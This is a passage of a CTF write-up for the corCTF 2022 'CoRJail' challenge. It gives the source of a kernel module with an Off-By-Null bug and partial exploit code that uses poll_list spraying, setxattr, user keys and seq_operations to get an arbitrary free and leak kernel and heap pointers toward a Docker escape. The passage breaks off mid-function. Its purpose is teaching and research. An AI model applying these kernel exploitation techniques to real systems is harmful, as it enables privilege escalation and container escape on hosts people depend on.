
[corCTF 2022] CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel

CoRJail is a kernel exploitation / Docker escape challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters by exploiting an Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from an nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!

Overview

Last year, FizzBuzz101 and I designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. Over the past year, the technique has been used extensively in real-world exploits and was later extended to work with FUSE instead of userfaultfd.

For corCTF 2022, we decided to do the same, designing two challenges whose solutions required a novel approach. I decided to write a kernel exploitation / Docker escape challenge, CoRJail, demonstrating a novel technique I originally used to compromise Google’s kCTF Kubernetes infrastructure. This approach makes it possible to obtain a powerful arbitrary free primitive in almost every general purpose cache by exploiting poll_list objects. FizzBuzz101, instead, designed a challenge, Cache of Castaways, whose solution required a cross-cache overflow into cred_jar to corrupt the current task’s cred structure and get root privileges.

CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image (improperly called CoROS :P). The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing access to the Linux Kernel Key Retention Service from within the container. The custom seccomp profile can be found here.

The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.

All modern protections, like KASLR, SMEP, SMAP, KPTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED etc. were enabled. CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary and CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, no modprobe_path trick. Finally, I unset CONFIG_DEBUG_FS and CONFIG_KALLSYMS_ALL, making many symbols not available in /proc/kallsyms.

The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs interface, was created to actually display per-CPU syscall count, restricting the displayed result only to syscalls specified in a filter. Users were allowed to set a new filter using echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon. For example, to get per-CPU usage count of read() and write() a user can simply use echo -n 'sys_read,sys_write' > /proc_rw/cormon.

The default CoRMon filter was actually a hint: it displayed many of the syscalls I used in my exploit, namely poll(), keyctl() and setxattr().

If you want to try to solve the challenge before reading the rest of the article, you can find it in the corCTF 2022 Public Archive. Please note that I could not upload the coros.qcow2 image to GitHub because of its size, so you will need to build it yourself using the provided script.

TL;DR

Exploit an Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get an OOB Read. Leak heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key and guess the correct options on the CoR Flag License Website to get the actual flag.

It’s Only A Zero, What Could Go Wrong?

Given the complexity of the exploitation phase and the 48-hour limit, I decided to make the bug extremely easy to spot and trigger. On the other hand, I decided not to provide source code, considering that the reverse engineering process would not have taken too long. Here is the original CoRMon source code:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/seq_file.h>
#include <trace/syscall.h>
#include <asm/syscall.h>
#include <asm/ftrace.h>

MODULE_AUTHOR("D3v17");
MODULE_LICENSE("GPL");

extern struct syscall_metadata *syscall_nr_to_meta(int nr);
extern const char *get_syscall_name(int syscall_nr);

static int get_syscall_nr(char *sc);
static int update_filter(char *syscalls);
static int cormon_proc_open(struct inode *inode, struct  file *file);
static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf,size_t count, loff_t *ppos); 
static void *cormon_seq_start(struct seq_file *seqfile, loff_t *pos);
static void *cormon_seq_next(struct seq_file *seqfile, void *v, loff_t *pos);
static void cormon_seq_stop(struct seq_file *seqfile, void *v);
static int cormon_seq_show(struct seq_file *f, void *ppos);
static int init_procfs(void);
static void cleanup_procfs(void);

DECLARE_PER_CPU(u64[NR_syscalls], __per_cpu_syscall_count);

static uint8_t filter[NR_syscalls];
static struct proc_dir_entry *cormon;
static char initial_filter[] = "sys_execve,sys_execveat,sys_fork,sys_keyctl,sys_msgget,sys_msgrcv,sys_msgsnd,sys_poll,sys_ptrace,sys_setxattr,sys_unshare";


static const struct proc_ops cormon_proc_ops = {
    .proc_open  = cormon_proc_open,
    .proc_read  = seq_read,
    .proc_write = cormon_proc_write
};


static struct seq_operations cormon_seq_ops = {
    .start  = cormon_seq_start,
    .next   = cormon_seq_next,
    .stop   = cormon_seq_stop,
    .show   = cormon_seq_show
};


static int get_syscall_nr(char *sc)
{
    struct syscall_metadata *entry;
    int nr;

    for (nr = 0; nr < NR_syscalls; nr++)
    {
        entry = syscall_nr_to_meta(nr);

        if (!entry)
            continue;

        if (arch_syscall_match_sym_name(entry->name, sc))
            return nr;
    }

    return -EINVAL;
}


static int update_filter(char *syscalls)
{
    uint8_t new_filter[NR_syscalls] = { 0 };
    char *name;
    int nr;

    while ((name = strsep(&syscalls, ",")) != NULL || syscalls != NULL)
    {
        nr = get_syscall_nr(name);

        if (nr < 0)
        {
            printk(KERN_ERR "[CoRMon::Error] Invalid syscall: %s!\n", name);
            return -EINVAL;
        }

        new_filter[nr] = 1;
    }

    memcpy(filter, new_filter, sizeof(filter));

    return 0;
}


static int cormon_proc_open(struct inode *inode, struct  file *file)
{
    return seq_open(file, &cormon_seq_ops);
}


static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    loff_t offset = *ppos;
    char *syscalls;
    size_t len;

    if (offset < 0)
        return -EINVAL;

    if (offset >= PAGE_SIZE || !count)
        return 0;

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count;

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC);
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len))
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00';

    if (update_filter(syscalls))
    {
        kfree(syscalls);
        return -EINVAL;
    }

    kfree(syscalls);

    return count;
}


static void *cormon_seq_start(struct seq_file *s, loff_t *pos)
{
    return *pos > NR_syscalls ? NULL : pos;
}


static void *cormon_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
    return (*pos)++ > NR_syscalls ? NULL : pos;
}


static void cormon_seq_stop(struct seq_file *s, void *v)
{
    return;
}


static int cormon_seq_show(struct seq_file *s, void *pos)
{
    loff_t nr = *(loff_t *)pos;
    const char *name;
    int i;

    if (nr == 0)
    {
        seq_putc(s, '\n');

        for_each_online_cpu(i)
            seq_printf(s, "%9s%d", "CPU", i);

        seq_printf(s, "\tSyscall (NR)\n\n");
    }

    if (filter[nr])
    {
        name = get_syscall_name(nr);

        if (!name)
            return 0;

        for_each_online_cpu(i)
            seq_printf(s, "%10llu", per_cpu(__per_cpu_syscall_count, i)[nr]);

        seq_printf(s, "\t%s (%lld)\n", name, nr);
    }

    if (nr == NR_syscalls)
        seq_putc(s, '\n');

    return 0;
}


static int init_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Init] Initializing module...\n");

    cormon = proc_create("cormon", 0666, NULL, &cormon_proc_ops);

    if (!cormon)
    {
        printk(KERN_ERR "[CoRMon::Error] proc_create() call failed!\n");
        return -ENOMEM;
    }

    if (update_filter(initial_filter))
        return -EINVAL;

    printk(KERN_INFO "[CoRMon::Init] Initialization complete!\n");

    return 0;
}


static void cleanup_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Exit] Cleaning up...\n");

    remove_proc_entry("cormon", NULL);

    printk(KERN_INFO "[CoRMon::Exit] Cleanup done, bye!\n");
}


module_init(init_procfs);
module_exit(cleanup_procfs);

We can interact with the module through a procfs interface using read() and write(). When we use write() the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function instead, is used to display syscalls information when we use read().

As we can see, there is a clear Off-By-Null in cormon_proc_write(). Let’s extract the function from source code and ignore the rest:

static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    [...]

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count; // [1]

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC); // [2]
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len)) // [3]
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00'; // [4]

    [...]
}

If the number of bytes written is greater than PAGE_SIZE (4096) then the len variable is set to PAGE_SIZE - 1, otherwise it is set to count. [1]

Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k [2] and the list of syscalls is copied from user-space to kernel-space: it will be parsed by the update_filter() function. [3] The list, now copied in kernel-space, is subsequently null terminated. [4]

The check clearly does not cover the case where the number of bytes written is exactly PAGE_SIZE. In that case, len is equal to count, and the line syscalls[len] = '\x00' becomes syscalls[4096] = '\x00', writing the null byte one byte past the end of the 4096-byte chunk.
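The boundary case can be checked with a small userspace model of the length computation. This is only a sketch: cormon_len() mirrors the ternary at [1], while cormon_len_fixed() and terminator_overflows() are hypothetical helpers introduced here for illustration and are not part of the module.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096u   /* stands in for the kernel's PAGE_SIZE */

/* Mirrors the module: only counts strictly greater than PAGE_SIZE are clamped. */
static size_t cormon_len(size_t count)
{
    assert(count > 0);          /* the module returns early when count is 0 */
    return count > MODEL_PAGE_SIZE ? MODEL_PAGE_SIZE - 1 : count;
}

/* Hypothetical fix: clamp with >= so that len never reaches PAGE_SIZE. */
static size_t cormon_len_fixed(size_t count)
{
    assert(count > 0);
    return count >= MODEL_PAGE_SIZE ? MODEL_PAGE_SIZE - 1 : count;
}

/* Returns 1 when syscalls[len] would land outside the 4096-byte chunk. */
static int terminator_overflows(size_t len)
{
    return len >= MODEL_PAGE_SIZE;
}
```

Only count == 4096 slips through: 4095 stays in bounds, and 4097 is clamped back to 4095.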

At first glance, considering the hardened kernel and the limited attack surface from within the container, a single zero written out of bounds does not seem too dangerous. As we are going to demonstrate, it is more than enough to escape from the container and get root privileges on the host.

A Dive Into poll_list Objects

As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces, and this prevents us from accessing many kernel features. Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so this time the good old msg_msg is left out of the picture. Instead, our exploitation process will mainly rely on poll_list objects. This structure can be used from within the container without having to meet any specific requirements.

The technique we will cover in this article is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, whereas here we only have a single null byte written out of bounds.

poll_list objects are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.

int poll(struct pollfd fds[], nfds_t nfds, int timeout);

poll() accepts three arguments:

  • fds: an array of pollfd structures.
  • nfds: the number of pollfd structures in the fds array.
  • timeout: the number of milliseconds to wait for an event to occur.

struct pollfd {
    int   fd;
    short events;
    short revents;
};

struct poll_list {
    struct poll_list *next; // [1]
    int len; // [2]
    struct pollfd entries[]; // [3]
};

The poll_list structure consists of a pointer to the next poll_list [1], a length field holding the number of pollfd structures in the entries array [2], and entries, a flexible array of pollfd structures [3]. Each entry is 8 bytes in size.

When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array from user-space to kernel-space:

#define POLL_STACK_ALLOC	256
#define PAGE_SIZE 4096

#define POLLFD_PER_PAGE  ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd))

#define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list))  / \
			sizeof(struct pollfd))

[...]

static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
		struct timespec64 *end_time)
{

    struct poll_wqueues table;
    int err = -EFAULT, fdcount, len;
    /* Allocate small arguments on the stack to save memory and be
       faster - use long to make sure the buffer is aligned properly
       on 64 bit archs to avoid unaligned access */
    long stack_pps[POLL_STACK_ALLOC/sizeof(long)]; // [1]
    struct poll_list *const head = (struct poll_list *)stack_pps;
    struct poll_list *walk = head;
 	unsigned long todo = nfds;

	if (nfds > rlimit(RLIMIT_NOFILE))
		return -EINVAL;

	len = min_t(unsigned int, nfds, N_STACK_PPS); // [2]

	for (;;) {
		walk->next = NULL;
		walk->len = len;
		if (!len)
			break;

		if (copy_from_user(walk->entries, ufds + nfds-todo,
					sizeof(struct pollfd) * walk->len))
			goto out_fds;

		todo -= walk->len;
		if (!todo)
			break;

		len = min(todo, POLLFD_PER_PAGE); // [3]
		walk = walk->next = kmalloc(struct_size(walk, entries, len),
					    GFP_KERNEL); // [4]
		if (!walk) {
			err = -ENOMEM;
			goto out_fds;
		}
	}

	poll_initwait(&table);
	fdcount = do_poll(head, &table, end_time); // [5]
	poll_freewait(&table);

	if (!user_write_access_begin(ufds, nfds * sizeof(*ufds)))
		goto out_fds;

	for (walk = head; walk; walk = walk->next) {
		struct pollfd *fds = walk->entries;
		int j;

		for (j = walk->len; j; fds++, ufds++, j--)
			unsafe_put_user(fds->revents, &ufds->revents, Efault);
  	}
	user_write_access_end();

	err = fdcount;
out_fds:
	walk = head->next;
	while (walk) { // [6]
		struct poll_list *pos = walk;
		walk = walk->next;
		kfree(pos);
	}

	return err;

Efault:
	user_write_access_end();
	err = -EFAULT;
	goto out_fds;
}

do_sys_poll() has two paths, a fast path, and a slow one. As we can see at the beginning of the function, stack_pps [1], a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries [2]. This is the fast path: entries are stored on the stack to save memory and improve speed.

If we submit more than 30 pollfd entries, we enter the slow path, and the remaining ones will be allocated on the kernel heap. This means that if we do the math correctly, controlling the number of monitored file descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. [4]
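The math mentioned above can be sketched in a few lines. The snippet assumes the x86_64 sizes used throughout this article (a 16-byte poll_list header and 8-byte pollfd entries) and the usual list of general purpose kmalloc cache sizes. Both helper names are made up for this example.

```c
#include <assert.h>
#include <stddef.h>

#define POLL_LIST_HDR 16u   /* sizeof(struct poll_list), x86_64 assumption */
#define POLLFD_BYTES   8u   /* sizeof(struct pollfd) */

/* Bytes requested from kmalloc() for a heap poll_list with nentries entries. */
static size_t poll_list_bytes(size_t nentries)
{
    assert(nentries >= 1 && nentries <= 510);   /* POLLFD_PER_PAGE upper bound */
    return POLL_LIST_HDR + nentries * POLLFD_BYTES;
}

/* Smallest general purpose cache that fits the request, 0 if none does. */
static size_t kmalloc_cache_for(size_t bytes)
{
    static const size_t caches[] = { 8, 16, 32, 64, 96, 128, 192, 256,
                                     512, 1024, 2048, 4096, 8192 };

    for (size_t i = 0; i < sizeof(caches) / sizeof(caches[0]); i++)
        if (bytes <= caches[i])
            return caches[i];
    return 0;
}
```

With these assumptions, one or two heap entries land in kmalloc-32, three entries already spill into kmalloc-64, and 510 entries fill a kmalloc-4k chunk exactly.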

It is possible to allocate a maximum of POLLFD_PER_PAGE (510) entries per page. [3] If this limit is exceeded, a new poll_list is allocated to store the remaining entries and it is connected to the previous one in a singly linked list. The for loop will continue until all entries have been stored in kernel memory.

Let’s say, for example, that we call poll() with 30 + 510 + 1 file descriptors. The first 30 entries are stored on the stack, and the remaining ones result in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list with a single entry allocated in kmalloc-32. The structures are connected in a singly linked list.
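To double check how a given nfds is split between the stack buffer and heap chunks, here is a minimal userspace model of the allocation loop in do_sys_poll(). It is a sketch, not kernel code: the constants are the x86_64 values discussed above, and poll_heap_chunks() is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>

#define HDR_BYTES        16u    /* sizeof(struct poll_list), x86_64 assumption */
#define POLLFD_BYTES      8u    /* sizeof(struct pollfd) */
#define STACK_ENTRIES    30u    /* N_STACK_PPS */
#define ENTRIES_PER_PAGE 510u   /* POLLFD_PER_PAGE */

/*
 * Fills sizes[] with the kmalloc() request size of each heap poll_list that
 * poll() would allocate for nfds descriptors, and returns how many there are.
 */
static size_t poll_heap_chunks(unsigned int nfds, size_t *sizes, size_t max)
{
    size_t n = 0;
    unsigned int todo = nfds;
    unsigned int len = todo < STACK_ENTRIES ? todo : STACK_ENTRIES;

    assert(sizes != NULL);

    todo -= len;                /* these entries live in stack_pps */
    while (todo && n < max) {
        len = todo < ENTRIES_PER_PAGE ? todo : ENTRIES_PER_PAGE;
        sizes[n++] = HDR_BYTES + (size_t)len * POLLFD_BYTES;
        todo -= len;
    }
    return n;
}
```

For nfds = 541 the model reports two heap chunks of 4096 and 24 bytes, that is one object in kmalloc-4k chained to one in kmalloc-32. For nfds = 30 nothing is allocated on the heap at all.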

After all poll_list objects have been allocated, there is a call to do_poll() [5]: it will monitor the provided file descriptors until a specific event occurs or the timer expires. The end_time variable here corresponds to the timeout variable we passed as third argument to the poll() syscall. This means that poll_list objects can be kept in memory for an arbitrary amount of time, then, when the timer expires, they are automatically freed.

The very interesting part is how poll_list structures are freed: a while loop is used to traverse the singly linked list, freeing each of them. [6] Now let’s look at what we have from an attacker’s perspective.

We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed to by its next field (first QWORD) is automatically freed when a timer that we control expires. This means that given an Out-Of-Bounds Write or a Use-After-Free Write primitive we can overwrite the next field of a poll_list structure with the address of a target object. Once the timer expires, that object will be automatically freed.

The only constraint is that the first QWORD of the target object must be NULL, otherwise the while loop will treat it as a valid pointer and try to keep traversing the list. This is not a problem: we can use a misaligned arbitrary free primitive, or we can simply target objects whose first QWORD is equal to zero.

In the specific case of kmalloc-4k, if the poll_list next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even with a single byte), making it point to another object. When the timer expires, the kernel will be tricked into freeing the wrong object. This trick is exactly what we are going to use in our exploit.
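The effect of a one-byte partial overwrite with zero can be illustrated with plain pointer arithmetic. The sketch below assumes a little-endian machine (so the byte at offset 0 of the chunk is the least significant byte of next) and a next pointer into kmalloc-32. The helper names and the addresses used in the usage note are made up.

```c
#include <assert.h>
#include <stdint.h>

#define SLOT_SIZE 32u   /* object size in kmalloc-32 */

/* The Off-By-Null clears the least significant byte of the next pointer. */
static uint64_t off_by_null(uint64_t next)
{
    return next & ~(uint64_t)0xff;
}

/* How many kmalloc-32 slots the pointer moves back (0 means "unchanged"). */
static unsigned int slots_moved(uint64_t next)
{
    assert(next % SLOT_SIZE == 0);  /* slab objects are slot-aligned */
    return (unsigned int)((next - off_by_null(next)) / SLOT_SIZE);
}
```

For instance, a hypothetical next pointer of 0xffff888004c2a4a0 becomes 0xffff888004c2a400, which is still 32-byte aligned and sits five slots earlier in the same page. If the low byte was already zero, the pointer does not change and nothing is gained, which is one reason to spray several poll_list chains.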

The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object, because the poll() syscall blocks until a specific event occurs or the timer expires.

#define N_STACK_PPS 30
#define POLLFD_PER_PAGE 510
#define POLL_LIST_SIZE 16

#define NFDS(size) ((((size) - POLL_LIST_SIZE) / sizeof(struct pollfd)) + N_STACK_PPS)


pthread_t poll_tid[0x1000];
size_t poll_threads;
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;


struct t_args
{
    int id;
    int nfds;
    int timeout;
};


void *alloc_poll_list(void *args)
{
    struct pollfd *pfds;
    int nfds, timeout, id;

    id    = ((struct t_args *)args)->id;
    nfds  = ((struct t_args *)args)->nfds;
    timeout = ((struct t_args *)args)->timeout;

    pfds = calloc(nfds, sizeof(struct pollfd));

    for (int i = 0; i < nfds; i++)
    {
        pfds[i].fd = fds[0];
        pfds[i].events = POLLERR;
    }

    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);

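    //printf("[Thread %d] Start polling...\n", id);
    int ret = poll(pfds, nfds, timeout);
    //printf("[Thread %d] Polling complete: %d!\n", id, ret); 

    // Release per-thread allocations and return a defined value to pthread_join()
    free(pfds);
    free(args);
    return NULL;
}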


void create_poll_thread(int id, size_t size, int timeout)
{
    struct t_args *args;

    args = calloc(1, sizeof(struct t_args));

    if (size > PAGE_SIZE)
        size = size - ((size/PAGE_SIZE) * sizeof(struct poll_list));

    args->id = id;
    args->nfds = NFDS(size);
    args->timeout = timeout;

    pthread_create(&poll_tid[id], 0, alloc_poll_list, (void *)args);
}


void join_poll_threads(void)
{
    for (int i = 0; i < poll_threads; i++)
        pthread_join(poll_tid[i], NULL);
        
    poll_threads = 0;
}

[...]

fds[0] = open("/etc/passwd", O_RDONLY);

for (int i = 0; i < 8; i++)
    create_poll_thread(i, 4096 + 32, 3000);

join_poll_threads();

[...]

The Exploit - From Zero To Information Leak

The strategy we are going to use in the first part of the exploit, consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the next field of a poll_list structure chained to another one in kmalloc-32, making the corrupted pointer point to another object in the slab. When the timer expires, that object will be automatically freed.

We need to choose a target structure that, once arbitrarily freed, can be corrupted to give us an Out-Of-Bounds Read primitive and a subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick. A good candidate could be simple_xattr, but we need the first QWORD of the target object to be NULL, so we cannot use it. Since add_key() and keyctl() are not blocked by the custom seccomp profile, we can opt for user_key_payload instead.

The problem with this structure is that its first member, struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc, the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating a user key.

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
	 size_t size, int flags)
{
    [...]
    
    if (size > XATTR_SIZE_MAX)
        return -E2BIG;
    kvalue = kvmalloc(size, GFP_KERNEL); // [1]
    if (!kvalue)
        return -ENOMEM;
    if (copy_from_user(kvalue, value, size)) { // [2]
        error = -EFAULT;
        goto out;
    }
    
    [...]

out:
    kvfree(kvalue); // [3]

    return error;
}

With setxattr(), we can allocate a chunk of arbitrary size [1] and fill it with arbitrary data [2], then it will be automatically freed right before the function returns [3]. We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero. We simply need to call setxattr() right before alloc_key(): because of the freelist’s LIFO behavior, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. With this in mind, we can start writing our exploit:

    [...]

    assign_to_core(0); // [1]

    for (int i = 0; i < 2048; i++) // [2]
        alloc_seq_ops(i);

    for (int i = 0; i < 72; i++)
    {   
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        keys[i] = alloc_key(n_keys++, key, 32); // [3]
    }
    
    for (int i = 0; i < 14; i++)
        create_poll_thread(i, 4096 + 24, 3000, false); // [4]

    for (int i = 72; i < MAX_KEYS; i++) 
    {
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        keys[i] = alloc_key(n_keys++, key, 32); // [5]
    }
    
    [...]

First, we assign the current process to core 0 using assign_to_core() (a sched_setaffinity() wrapper), since we are working in a multi-core environment and slabs are per-CPU. [1] Then, we start spraying many seq_operations structures in kmalloc-32 to fill partial slabs, so the next allocations will end up in a brand new slab. [2]

We proceed using alloc_key() (a simple add_key() wrapper) to spray many user_key_payload structures in kmalloc-32. [3] As explained above, we use setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.
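For the chunk zeroed by setxattr() to be reused, the key allocation has to land in kmalloc-32 as well, and the user_key_payload header takes up most of that space. A minimal sketch of the sizing, assuming the x86_64 layout of struct user_key_payload in this kernel version. The *_model types are userspace mirrors written for this example, and max_key_data_len() is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace mirror of struct rcu_head: two pointers, 16 bytes on x86_64. */
struct rcu_head_model {
    struct rcu_head_model *next;    /* first QWORD: must be NULL for our free */
    void (*func)(struct rcu_head_model *head);
};

/* Userspace mirror of struct user_key_payload. */
struct user_key_payload_model {
    struct rcu_head_model rcu;      /* left uninitialized at allocation time */
    unsigned short datalen;         /* length of the key data */
    char data[] __attribute__((aligned(8)));
};

/* Largest key payload that still fits in a chunk of the given cache size. */
static size_t max_key_data_len(size_t cache_size)
{
    size_t header = offsetof(struct user_key_payload_model, data);

    assert(cache_size > header);
    return cache_size - header;
}
```

Under these assumptions the header is 24 bytes, so a key stays in kmalloc-32 only if its payload is at most 8 bytes long.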

Now we finally spray poll_list structures in kmalloc-4k, chained to poll_list in kmalloc-32. [4] At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user_key_payload in orange.

We can continue spraying more user keys in kmalloc-32, to completely saturate the slab. [5] [Fig. 1B]

We are ready to trigger the Off-By-Null bug, hijack a poll_list next pointer and trigger the arbitrary free:

    [...]

    write(fd, data, PAGE_SIZE); // [1]

    join_poll_threads(); // [2]

    [...]

We can trigger the allocation of a chunk in kmalloc-4k simply by writing 4096 bytes to the CoRMon procfs interface. [1] This will also cause a null byte to be written out of bounds, corrupting the next object in memory. Since we sprayed poll_list structures in kmalloc-4k, and each one has a pointer to a poll_list in kmalloc-32, we will be able to corrupt one of the pointers, making it point to one of the user keys we sprayed in the previous step. [Fig. 2A]

Now we can simply use join_poll_threads() and wait until timers expire and poll_list objects are automatically freed. [2] Since we corrupted one of the singly linked lists, a user_key_payload will be arbitrarily freed. [Fig. 2B]

We caused a potential Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain an Out-Of-Bounds Read primitive:

    [...]

    for (int i = 2048; i < 2048 + 128; i++)
        alloc_seq_ops(i); // [1]

    if (leak_kernel_pointer() < 0) // [2]
    {
        puts("[X] Kernel pointer leak failed, try again...");
        exit(1);
    }

    free_all_keys(true); // [3]

    for (int i = 0; i < 72; i++)
        alloc_tty(i); // [4]

    if (leak_heap_pointer(corrupted_key) < 0) // [5]
    {
        puts("[X] Heap pointer leak failed, try again...");
        exit(1);
    }

    [...]

First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its datalen field (an unsigned short) with the two lower bytes of the single_next pointer. In our case, the two lower bytes of single_next are 0x4330, so this will give us a huge Out-Of-Bounds Read primitive. A proc_single_show() pointer, instead, will overwrite the data field of the user key. [1] You can see the seq_operations structures in yellow in [Fig. 3A]: one of them corrupted the key.
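The overlap between the two structures can be reproduced in userspace. The sketch below assumes the x86_64 layouts (four 8-byte function pointers in seq_operations, datalen at offset 16 and data at offset 24 in user_key_payload) and a little-endian machine. The struct and helper names are made up, and the pointer values in the usage note are hypothetical except for the low 16 bits of single_next quoted above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define KEY_DATALEN_OFF 16  /* offsetof(struct user_key_payload, datalen) */
#define KEY_DATA_OFF    24  /* offsetof(struct user_key_payload, data) */

/* Userspace model of struct seq_operations: start, stop, next, show. */
struct seq_ops_model {
    uint64_t start;
    uint64_t stop;
    uint64_t next;
    uint64_t show;
};

/* What the key code reads as datalen once seq_operations reuses the chunk. */
static uint16_t overlapped_datalen(const struct seq_ops_model *ops)
{
    uint16_t datalen;

    assert(sizeof(*ops) == 32);     /* one kmalloc-32 object */
    memcpy(&datalen, (const unsigned char *)ops + KEY_DATALEN_OFF,
           sizeof(datalen));
    return datalen;
}

/* First QWORD returned when the corrupted key is read. */
static uint64_t overlapped_data_qword(const struct seq_ops_model *ops)
{
    uint64_t q;

    memcpy(&q, (const unsigned char *)ops + KEY_DATA_OFF, sizeof(q));
    return q;
}
```

With next set to a value ending in 0x4330, overlapped_datalen() returns 0x4330 (17200 bytes readable from a 32-byte chunk), and the first leaked QWORD is the show pointer.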

We can now use the leak_kernel_pointer() function and iterate through all the keys until we leak the proc_single_show address, this way we will identify the corrupted key and we will be able to calculate the kernel base address. [2] Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.

When we open a ptmx, two structures of interest are allocated: the well-known tty_struct in kmalloc-1024 and another one, tty_file_private, in kmalloc-32. Each tty_file_private structure has a pointer to its associated tty_struct, which means that by leaking a tty_file_private in kmalloc-32 we can obtain the address of a tty_struct object in kmalloc-1024.

We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]), [3] with the exception of the corrupted key, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]), opening many ptmx devices. [4] Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak the address of a tty_struct object. [5] [Fig. 3B]
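One possible way to pick a tty_struct address out of the leaked data is sketched below. It is not the leak_heap_pointer() used in the exploit: the heuristics (a 1024-byte aligned first pointer followed by three more pointers outside the kernel image range, matching the tty, file and list fields of tty_file_private) are assumptions made for illustration, and both function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Kernel-space pointer that is not inside the kernel image mapping. */
static int looks_like_heap_ptr(uint64_t p)
{
    return (p >> 48) == 0xffff && p < 0xffffffff80000000ULL;
}

/*
 * Scans leaked QWORDs for something shaped like a tty_file_private:
 * { tty, file, list.next, list.prev }. Returns the tty pointer, or 0.
 */
static uint64_t find_tty_struct(const uint64_t *leak, size_t nqwords)
{
    assert(leak != NULL);

    for (size_t i = 0; i + 4 <= nqwords; i++) {
        uint64_t tty = leak[i];

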